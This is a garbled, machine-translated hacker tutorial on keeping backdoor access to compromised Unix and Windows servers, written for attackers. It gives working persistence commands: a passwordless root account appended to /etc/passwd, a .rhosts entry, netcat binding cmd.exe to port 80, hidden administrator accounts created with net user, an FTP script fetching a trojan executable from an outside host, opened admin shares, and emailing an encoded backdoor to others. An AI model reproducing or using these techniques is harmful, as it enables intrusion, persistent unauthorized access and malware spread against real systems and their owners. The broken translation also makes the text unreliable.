For us such a dish hand, finally got the servers is not easy, if it is found it miserable. In fact, the open back door methods there are many, below I to talk, I've learned of several ways.
Add suid bit to the shell on, although very simple, but can easily be found.
2. Echo "hack::0:0::/:/bin/csh" >> /etc/passwd
That is, to the system to increase A The ID is 0 for root)account, no password, but the administrator with the find command you can find.
If this system opened a 5 1 2 and 5 1 3 port, you can. The one called hack Add to. rhosts file, rlogin login without password.
Add a"wiz" command, and then telnet www.xxx.com 2 5 After the wiz, which you can.
5. Rootkit virus
These things now is pretty fiery stuff, but be careful of the file after the applicability date, etc. some of the small details. Some need to compile it yourself, or compiled.
Sunx that the backdoor is very good, does not produce a journal file to prevent the who and so on. Need to compile, but running on redhat 6.1 is very good. But in 7. 1 and other versions as if it is a little bug.
Or you can bindshell, you can replace inetd. conf is not commonly used service, the note file modification time.
7. Http Backdoor
In fact, the General of the firewall to the Web service limit less of it, so we can from here to start, here need to use port redirection. Simple that is web open http service 2, The A is http itself, one is the remote shell bindshell on. The firewall filter every other port, prohibiting reverse connection, simple is can be used in nc. （netcat this put cmd. exe is bound to the 8 0 port up. telnet www.xxx.com 8 0 and then you get a shell. Or you can use asp,php. cgi and other code written in the back door, also can be used to the same effect.
If it is a xnix server, no way.
net user hacker windychild /add
net localgroup administrators hacker /add ...to create the super admin user
echo open www.xxx.com>c:\ftp.txt
echo get srv. exe>>c:\ftp.txt
copy srv.exe c:\winnt\
del c:\srv.exe ...... Can set up their own Trojan horse or back door, etc.
.... Or you can write on open 3 3 8 9 service, the telnet statement
The other, open to share!
net share ipc=ipc$
net share hdc=c$
If the hard point, then, simply give it the last rootkit for win.
Set yourself a base64-encoded files to your friends, and then put the back door. exe convert message encoding.
In fact, the above methods are very common methods. There are a lot of ways, and sometimes can't sort it out, but for the uninitiated enough!